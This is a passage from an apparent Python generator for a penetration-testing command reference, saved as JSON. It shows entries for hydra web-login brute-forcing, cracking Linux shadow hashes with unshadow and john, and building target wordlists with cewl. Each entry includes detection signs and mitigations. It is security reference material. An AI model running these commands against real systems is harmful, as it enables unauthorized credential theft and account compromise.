e("hydra-http-post","hydra","password_attacks",5,L,"hydra -l admin -P /usr/share/wordlists/rockyou.txt <target> http-post-form '/login:user=^USER^&pass=^PASS^:Invalid credentials'","HTTP POST Form Brute-Force","Brute-forces web login forms via HTTP POST requests.",{"http-post-form":"Protocol","/login":"Path","^USER^/^PASS^":"Placeholders","Invalid credentials":"Failure string"},"[80][http-post-form] host: target login: admin password: admin123","Brute-force web application login forms.",["Login form URL","Failure indicator string"],["T1110.001"],"Credential Access",["Multiple failed logins in web logs","Rate limiting triggers"],["Rate limiting","CAPTCHA","Account lockout","MFA"],["Wrong failure string","Missing CSRF token in request"],["burp intruder","ffuf with POST"],["https://github.com/vanhauser-thc/thc-hydra"],["http","web","login","brute-force","form"]),
e("john-shadow","john","password_attacks",6,L,"unshadow /etc/passwd /etc/shadow > combined.txt && john combined.txt --wordlist=/usr/share/wordlists/rockyou.txt","Crack Linux Shadow Hashes","Combines passwd and shadow files, then cracks the password hashes.",{"unshadow":"Combine passwd+shadow","--wordlist":"Password list"},"admin:Password123\nuser1:welcome1\n2 passwords cracked","Crack Linux user passwords after obtaining /etc/shadow (requires root to read).",["Access to /etc/shadow (root)","John installed"],["T1003.008"],"Credential Access",["N/A — offline"],["Strong password policy","Use SHA-512 hashing","Restrict shadow file access"],["Not using unshadow first","Wrong hash format"],["hashcat -m 1800 (SHA-512)"],["https://www.openwall.com/john"],["shadow","linux","cracking","local","passwords"]),
e("cewl-wordlist","cewl","password_attacks",5,L,"cewl http://<target> -d 3 -m 6 -w custom_wordlist.txt","Custom Wordlist Generation","Crawls a website and generates a custom wordlist from page content — great for targeted attacks.",{"-d 3":"Crawl depth 3","-m 6":"Minimum word length 6","-w":"Output file"},"Generated 847 unique words from target website","Create targeted wordlists from company websites — employees often use company-related passwords.",["Target website accessible"],["T1589"],"Reconnaissance",["Web crawling activity in logs"],["Don't use company-related passwords"],["Setting depth too low","Not combining with rules"],["crunch (pattern-based)","cupp (personal wordlist)"],["https://github.com/digininja/CeWL"],["wordlist","custom","crawl","targeted","generation"]),
]

# ===================== SAVE ALL =====================
def save(filename, data):
    path = OUTPUT_DIR / filename
    with open(path, 'w') as f:
        json.dump(data, f, indent=2)
    print(f"  {filename}: {len(data)} commands")

if __name__ == "__main__":
    print("Bulk generating VAPT commands...")
    save("bulk_reconnaissance.json", RECON)
    save("bulk_enumeration.json", ENUM)
    save("bulk_exploitation.json", EXPLOIT)
    save("bulk_post_exploitation.json", POSTEX)
    save("bulk_password_attacks.json", PASSWD)
    
    # Count total across ALL files
    total = 0
    for f in OUTPUT_DIR.glob("*.json"):
        with open(f) as fp:
            total += len(json.load(fp))
    print(f"\n{'='*50}")
    print(f"TOTAL COMMANDS: {total}")
    print(f"{'='*50}")
